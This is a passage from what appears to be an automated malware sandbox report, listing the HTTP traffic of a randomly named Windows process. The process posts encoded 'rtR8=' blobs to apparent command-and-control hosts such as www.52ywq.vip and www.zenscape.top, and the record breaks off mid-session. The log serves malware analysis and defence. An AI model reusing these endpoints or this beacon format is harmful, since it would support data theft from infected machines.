                        Data Ascii: rtR8=/3ymXrZusQ/txeo3xdxT0Fmi83AdcsmqkdqgANgJyk9bMVPUZhFIGKd2cC9qqlAkvSagczuCXBO6h+BnCzCdBRW1q2JtmB7cuOhor546V0zkTMNhbpnJoyoB5Pa/oyxvFMYfNFbzbqZKCYfnNrzk9m5e6gF3FrAMivKXKbHwfnZjolQn/cAeqAW0pFB8JPKQDueOJXqn2j7MqCDw0C1XA4fUQTCMeZSQ7wyDxz2OiUM3epaCsPdvyvVJL9dUUtp5GsXeBnOt7lG6lzUx7VsXTcvnTJjNJ8GSelhY2LhISzYRfe9VN6egkzRl8qXI7esDHMWCtc1NYcI43Z/3e+LEOD4Fi0Cy1tg+f4L4qKLcp+lbGDS9imMWPEt4WaoKbyJtiG5ZBvyb1J+uDDtefbtykbufEwJsmvtRVWJQcGQxGEhNHcrA2bwryGR9P4yBDhTce3ySE37end/KtQ9PMa+B+c4A1Jij2VTpdHYpgC3AzYzcGhfISdwPrZ4BomneoCf52OGOKXK/xk9iildXbEYmeAZH/WQ6q2lf5Mp7QGlKNOtjV5IYR8s51XnNoHg1LqPm/hMDo5DZjWl1M+AXwG3VCIBEb3oFPL7DtANZbKzmnDS1vFZAbacb67+gfmU3uoxcICZxRmUtpzOItLcdbXhfQsgAUnUTo3aQk1r7ZtMw/4rZCMCZbZb+Qo6fG7Zql3CEF6nBbg0T9YesrEyYlL7ts1gSXiC/O7+PBVKNBVdedHp+wS6sEtSO+y8fDIo5omEXK2PCVPUpM0oAlqQ6FRhO14TK2vj8tmJsB7QtaWVDv7eF2MH2vV0LNiocaFg+wVc7DRwmq9SnfLBPdSo1ekf90a8tiSAPiOk3Lo3j6T8xF/pBFE2k8JvLAfsSA3mnFXA4KeEh8y7WR1KaefUg/lPeVd3O0qfYji8pNR6qjoFqDdxOu79cFqv+7rDHqKn90H560Lrq/WxLwb6xdnA3Ea1BTtqaC5UMISz4iA0LbGiHDHrbjZ4 [TRUNCATED]


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.64999123.224.37.78801588C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe
                        TimestampBytes transferredDirectionData
                        Oct 9, 2024 12:43:18.350198984 CEST482OUTGET /8z5k/?rtR8=y1aGUeBTtCWB8PYjxeZy4U2j9UMFcfikuJGyOOgv6AsofEnOPQxTGp57UW4jl24PiU2QUCC/WnCbrv11FxPlelKyqXg1oGGxy+JCqs86Q0OsQshvX6rpzC0a99GPlHxBY6RTMFs=&0Xm=T0UhHtW0dnoXGz2p HTTP/1.1
                        Host: www.1183377.app
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US
                        Connection: close
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.64999252.187.43.40801588C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe
                        TimestampBytes transferredDirectionData
                        Oct 9, 2024 12:43:24.045321941 CEST725OUTPOST /4i87/ HTTP/1.1
                        Host: www.52ywq.vip
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US
                        Accept-Encoding: gzip, deflate, br
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: no-cache
                        Connection: close
                        Content-Length: 209
                        Origin: http://www.52ywq.vip
                        Referer: http://www.52ywq.vip/4i87/
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                        Data Raw: 72 74 52 38 3d 67 56 64 41 4d 2f 57 70 30 7a 36 78 65 4f 61 38 76 37 46 34 51 75 31 71 73 5a 51 31 55 56 72 56 31 36 76 30 51 34 46 63 4c 55 54 66 53 58 33 49 30 46 79 42 78 6a 48 51 49 61 73 42 68 75 68 57 67 77 58 6a 6c 4f 2f 66 62 50 70 46 4f 46 79 31 32 5a 33 44 67 39 30 61 71 48 31 44 71 49 77 58 63 66 67 73 4d 33 50 5a 54 49 62 56 78 68 55 38 4b 44 45 6a 79 58 47 43 45 44 38 48 63 57 6d 6c 47 49 4d 73 4a 5a 69 54 57 77 6f 63 6a 49 4f 61 56 4d 48 66 6c 75 67 4d 37 58 4a 54 64 66 38 58 72 6b 39 2b 6e 32 64 50 36 36 78 54 79 49 78 46 6b 4b 44 71 42 39 55 30 70 4f 6a 59 4b 6e 78 39 70 64 36 35 34 50 39 76 63 55 7a 65
                        Data Ascii: rtR8=gVdAM/Wp0z6xeOa8v7F4Qu1qsZQ1UVrV16v0Q4FcLUTfSX3I0FyBxjHQIasBhuhWgwXjlO/fbPpFOFy12Z3Dg90aqH1DqIwXcfgsM3PZTIbVxhU8KDEjyXGCED8HcWmlGIMsJZiTWwocjIOaVMHflugM7XJTdf8Xrk9+n2dP66xTyIxFkKDqB9U0pOjYKnx9pd654P9vcUze
                        Oct 9, 2024 12:43:25.184266090 CEST359INHTTP/1.1 301 Moved Permanently
                        Date: Wed, 09 Oct 2024 10:43:24 GMT
                        Content-Type: text/html
                        Content-Length: 166
                        Connection: close
                        Location: https://6329.vhjhbv.com/4i87/
                        Server: CDNRay
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.64999352.187.43.40801588C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe
                        TimestampBytes transferredDirectionData
                        Oct 9, 2024 12:43:26.587732077 CEST749OUTPOST /4i87/ HTTP/1.1
                        Host: www.52ywq.vip
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US
                        Accept-Encoding: gzip, deflate, br
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: no-cache
                        Connection: close
                        Content-Length: 233
                        Origin: http://www.52ywq.vip
                        Referer: http://www.52ywq.vip/4i87/
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                        Data Raw: 72 74 52 38 3d 67 56 64 41 4d 2f 57 70 30 7a 36 78 59 76 4b 38 38 6f 74 34 62 75 31 72 78 70 51 31 61 31 72 52 31 36 7a 30 51 39 6b 52 4c 47 48 66 53 32 48 49 33 48 61 42 32 6a 48 51 44 36 73 45 76 4f 67 55 67 77 4c 52 6c 4c 48 66 62 4c 4a 46 4f 41 65 31 32 75 6a 45 68 74 31 38 6e 6e 31 64 33 59 77 58 63 66 67 73 4d 33 61 30 54 4c 72 56 79 55 63 38 4e 52 73 6b 74 6e 47 42 4e 6a 38 48 59 57 6d 35 47 49 4e 35 4a 62 57 70 57 32 73 63 6a 4b 47 61 56 5a 6e 41 77 65 67 4b 2f 58 49 52 52 73 52 6e 6d 30 6b 54 72 56 46 43 73 74 31 47 7a 2b 77 66 34 35 44 4a 54 74 30 32 70 4d 37 71 4b 48 78 58 72 64 43 35 71 59 78 49 54 67 57 39 38 4e 43 61 41 77 2b 52 32 4c 47 45 70 6b 52 76 78 6b 35 43 6d 67 3d 3d
                        Data Ascii: rtR8=gVdAM/Wp0z6xYvK88ot4bu1rxpQ1a1rR16z0Q9kRLGHfS2HI3HaB2jHQD6sEvOgUgwLRlLHfbLJFOAe12ujEht18nn1d3YwXcfgsM3a0TLrVyUc8NRsktnGBNj8HYWm5GIN5JbWpW2scjKGaVZnAwegK/XIRRsRnm0kTrVFCst1Gz+wf45DJTt02pM7qKHxXrdC5qYxITgW98NCaAw+R2LGEpkRvxk5Cmg==
                        Oct 9, 2024 12:43:27.667495012 CEST359INHTTP/1.1 301 Moved Permanently
                        Date: Wed, 09 Oct 2024 10:43:27 GMT
                        Content-Type: text/html
                        Content-Length: 166
                        Connection: close
                        Location: https://6329.vhjhbv.com/4i87/
                        Server: CDNRay
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.64999452.187.43.40801588C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe
                        TimestampBytes transferredDirectionData
                        Oct 9, 2024 12:43:29.136642933 CEST1762OUTPOST /4i87/ HTTP/1.1
                        Host: www.52ywq.vip
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US
                        Accept-Encoding: gzip, deflate, br
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: no-cache
                        Connection: close
                        Content-Length: 1245
                        Origin: http://www.52ywq.vip
                        Referer: http://www.52ywq.vip/4i87/
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                        Data Raw: 72 74 52 38 3d 67 56 64 41 4d 2f 57 70 30 7a 36 78 59 76 4b 38 38 6f 74 34 62 75 31 72 78 70 51 31 61 31 72 52 31 36 7a 30 51 39 6b 52 4c 47 66 66 53 45 50 49 6c 67 47 42 33 6a 48 51 64 4b 73 46 76 4f 68 4d 67 77 44 56 6c 4c 44 68 62 4e 46 46 63 79 57 31 77 61 50 45 6f 74 31 38 34 33 31 63 71 49 77 6e 63 65 4d 6f 4d 30 69 30 54 4c 72 56 79 56 73 38 65 6a 45 6b 2b 33 47 43 45 44 38 62 63 57 6d 46 47 4a 6c 70 4a 62 54 65 57 47 4d 63 6a 71 57 61 5a 4b 50 41 73 4f 67 49 34 58 49 7a 52 73 64 34 6d 30 49 35 72 57 59 70 73 71 39 47 7a 36 73 41 6c 4a 44 51 41 73 6f 41 75 65 6a 32 4f 51 4e 61 69 66 43 6f 71 4a 68 34 65 67 48 65 37 4a 32 5a 46 43 2f 2b 39 71 71 58 68 41 68 77 39 6c 4d 35 6b 70 58 78 6f 70 47 33 4c 49 4e 77 44 43 4e 63 4e 59 38 2f 56 39 62 2b 2b 34 51 6b 38 63 7a 6f 73 51 51 68 69 59 61 74 52 4e 2b 49 54 44 66 4f 32 4b 55 64 58 51 67 6d 47 79 77 74 44 76 48 47 67 37 47 6f 31 79 37 4a 78 77 63 36 6b 4b 51 62 65 53 54 72 35 4a 48 65 32 54 54 51 79 79 4c 70 62 6f 6d 51 62 35 33 7a 4e 34 46 5a 54 [TRUNCATED]
                        Data Ascii: rtR8=gVdAM/Wp0z6xYvK88ot4bu1rxpQ1a1rR16z0Q9kRLGffSEPIlgGB3jHQdKsFvOhMgwDVlLDhbNFFcyW1waPEot18431cqIwnceMoM0i0TLrVyVs8ejEk+3GCED8bcWmFGJlpJbTeWGMcjqWaZKPAsOgI4XIzRsd4m0I5rWYpsq9Gz6sAlJDQAsoAuej2OQNaifCoqJh4egHe7J2ZFC/+9qqXhAhw9lM5kpXxopG3LINwDCNcNY8/V9b++4Qk8czosQQhiYatRN+ITDfO2KUdXQgmGywtDvHGg7Go1y7Jxwc6kKQbeSTr5JHe2TTQyyLpbomQb53zN4FZTt5qPW3aNbnytyh5RCUp2ENJPKqkXZV6oXXyp1MtNAD9uopn5gr72vGf/xVSqfC0kgcaxDQxh7PxAVWzlqGM9o6K0s4+CjThEyP6YWziPdcxFp/p3fJYOl0FzY0GYyWcWp1kjNigV26mM6/rFhDE+Nr/80ZTQ74y8hv/LR6ce9VqhFJVnMyAV5SGAMdWdNzT9G4CIoCanqi8FsdBNJnbr6Jhexy8XkzmUFh2C3JOcZzMNPc9/r7SWmrrTCyajk0Asrw9irWYrwMva0QyrZzb1wxgUsDxG1t1Bb0s0J2myarshOAvCq4jOs9kHibmRl8n2S9cqR7sPXsNFZaDI87X8HnSoCEpXq44pPODfLH6CrPXQSGueiXZ0J4QdMEhefTg+Lhz9R6BJnLWOwG4o7kLFtwaFf/mYgFzaSNGMbQfHpLe4o5wDHGk9lHAJhCGFu7+aDK2Us/wMOX1JWa9+8f8MPgFgl+57Qw3Vptz5pJf65fIMUVU0sCm4X4iOIEbBp0rRqPPv3qYoI4ShxE5iqqWlQZvVa69i+xQ9IZHYwo62VtFYFu3Yhox5VUbFxfwH2yu+7zAK4AoskCBz5by3bI1L+Xxbp83u2dnw2GwEpkarPUTOaZDJSaOcfThuwg00gji5ZojISa+IROxd0Jr0cVv5o48wYFawppUM8L [TRUNCATED]
                        Oct 9, 2024 12:43:30.238106012 CEST359INHTTP/1.1 301 Moved Permanently
                        Date: Wed, 09 Oct 2024 10:43:30 GMT
                        Content-Type: text/html
                        Content-Length: 166
                        Connection: close
                        Location: https://6329.vhjhbv.com/4i87/
                        Server: CDNRay
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.2.64999552.187.43.40801588C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe
                        TimestampBytes transferredDirectionData
                        Oct 9, 2024 12:43:31.677375078 CEST480OUTGET /4i87/?rtR8=tX1gPPm4vGDAfdGb/LV0WNIl4Jkrf3fdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVtYIHl0Afz9YtPbMVCSGGc6Kk1GcbeTEHqh6wASkybV6fO9grfsM=&0Xm=T0UhHtW0dnoXGz2p HTTP/1.1
                        Host: www.52ywq.vip
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US
                        Connection: close
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                        Oct 9, 2024 12:43:32.782501936 CEST522INHTTP/1.1 301 Moved Permanently
                        Date: Wed, 09 Oct 2024 10:43:32 GMT
                        Content-Type: text/html
                        Content-Length: 166
                        Connection: close
                        Location: https://6329.vhjhbv.com/4i87/?rtR8=tX1gPPm4vGDAfdGb/LV0WNIl4Jkrf3fdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVtYIHl0Afz9YtPbMVCSGGc6Kk1GcbeTEHqh6wASkybV6fO9grfsM=&0Xm=T0UhHtW0dnoXGz2p
                        Server: CDNRay
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        9192.168.2.649996199.192.21.169801588C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe
                        TimestampBytes transferredDirectionData
                        Oct 9, 2024 12:43:38.357306004 CEST734OUTPOST /d8cw/ HTTP/1.1
                        Host: www.zenscape.top
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US
                        Accept-Encoding: gzip, deflate, br
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: no-cache
                        Connection: close
                        Content-Length: 209
                        Origin: http://www.zenscape.top
                        Referer: http://www.zenscape.top/d8cw/
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                        Data Raw: 72 74 52 38 3d 2f 69 74 57 33 34 73 62 30 31 4c 6c 48 38 6c 67 47 31 42 6a 63 43 4a 2f 30 33 79 52 48 7a 37 49 37 47 45 6a 6b 4f 2f 32 2b 4b 4e 39 47 7a 68 71 31 41 64 6f 30 39 56 42 71 56 62 38 54 73 65 67 61 63 57 54 54 72 52 73 74 78 4f 6e 4d 6b 58 43 33 69 59 72 70 6c 71 4a 79 71 71 69 75 65 78 2b 6c 44 30 57 41 54 48 31 52 33 62 70 58 4a 39 57 58 50 64 6a 65 67 44 66 6e 4d 33 50 36 49 6e 48 41 45 43 6f 62 7a 68 70 55 73 48 6e 75 67 58 6b 54 50 49 36 7a 44 7a 52 50 2b 6a 64 68 46 2f 38 31 4a 38 42 77 4d 45 34 53 33 38 55 30 59 4b 33 2f 52 66 34 77 44 4e 50 50 53 38 47 71 6e 69 57 2f 4a 6f 53 2f 36 4f 53 42 46 52 50
                        Data Ascii: rtR8=/itW34sb01LlH8lgG1BjcCJ/03yRHz7I7GEjkO/2+KN9Gzhq1Ado09VBqVb8TsegacWTTrRstxOnMkXC3iYrplqJyqqiuex+lD0WATH1R3bpXJ9WXPdjegDfnM3P6InHAECobzhpUsHnugXkTPI6zDzRP+jdhF/81J8BwME4S38U0YK3/Rf4wDNPPS8GqniW/JoS/6OSBFRP
                        Oct 9, 2024 12:43:38.961229086 CEST980INHTTP/1.1 404 Not Found
                        Date: Wed, 09 Oct 2024 10:43:38 GMT
                        Server: Apache
                        X-Frame-Options: SAMEORIGIN
                        Content-Length: 774
                        X-XSS-Protection: 1; mode=block
                        Connection: close
                        Content-Type: text/html
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        10192.168.2.649997199.192.21.169801588C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe
                        TimestampBytes transferredDirectionData
                        Oct 9, 2024 12:43:40.900551081 CEST758OUTPOST /d8cw/ HTTP/1.1
                        Host: www.zenscape.top
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US
                        Accept-Encoding: gzip, deflate, br
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: no-cache
                        Connection: close
                        Content-Length: 233
                        Origin: http://www.zenscape.top
                        Referer: http://www.zenscape.top/d8cw/
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                        Data Raw: 72 74 52 38 3d 2f 69 74 57 33 34 73 62 30 31 4c 6c 48 66 74 67 41 6d 35 6a 4c 79 4a 38 33 33 79 52 4e 54 37 45 37 47 49 6a 6b 4c 66 6d 72 6f 70 39 47 58 6c 71 6e 52 64 6f 33 39 56 42 6c 31 62 35 58 73 65 76 61 63 71 62 54 75 70 73 74 78 61 6e 4d 68 72 43 33 78 67 6f 6f 31 71 50 37 4b 71 67 78 75 78 2b 6c 44 30 57 41 54 53 51 52 33 7a 70 55 35 4e 57 57 75 64 73 43 77 44 63 33 73 33 50 78 6f 6e 44 41 45 43 65 62 32 46 44 55 75 76 6e 75 6c 7a 6b 64 2b 49 35 35 44 7a 66 46 65 69 6a 6b 48 66 79 30 6f 78 64 77 75 78 61 53 41 41 76 38 4f 4c 74 6a 69 66 62 69 54 74 4e 50 51 6b 30 71 48 69 38 39 4a 51 53 74 74 43 31 4f 78 30 73 75 4d 79 5a 50 66 44 38 52 72 31 5a 42 58 64 33 46 74 5a 68 50 77 3d 3d
                        Data Ascii: rtR8=/itW34sb01LlHftgAm5jLyJ833yRNT7E7GIjkLfmrop9GXlqnRdo39VBl1b5XsevacqbTupstxanMhrC3xgoo1qP7Kqgxux+lD0WATSQR3zpU5NWWudsCwDc3s3PxonDAECeb2FDUuvnulzkd+I55DzfFeijkHfy0oxdwuxaSAAv8OLtjifbiTtNPQk0qHi89JQSttC1Ox0suMyZPfD8Rr1ZBXd3FtZhPw==
                        Oct 9, 2024 12:43:41.496917009 CEST980INHTTP/1.1 404 Not Found
                        Date: Wed, 09 Oct 2024 10:43:41 GMT
                        Server: Apache
                        X-Frame-Options: SAMEORIGIN
                        Content-Length: 774
                        X-XSS-Protection: 1; mode=block
                        Connection: close
                        Content-Type: text/html
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        11192.168.2.649999199.192.21.169801588C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe
                        TimestampBytes transferredDirectionData
                        Oct 9, 2024 12:43:43.452348948 CEST1771OUTPOST /d8cw/ HTTP/1.1
                        Host: www.zenscape.top
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US
                        Accept-Encoding: gzip, deflate, br
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: no-cache
                        Connection: close
                        Content-Length: 1245
                        Origin: http://www.zenscape.top
                        Referer: http://www.zenscape.top/d8cw/
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
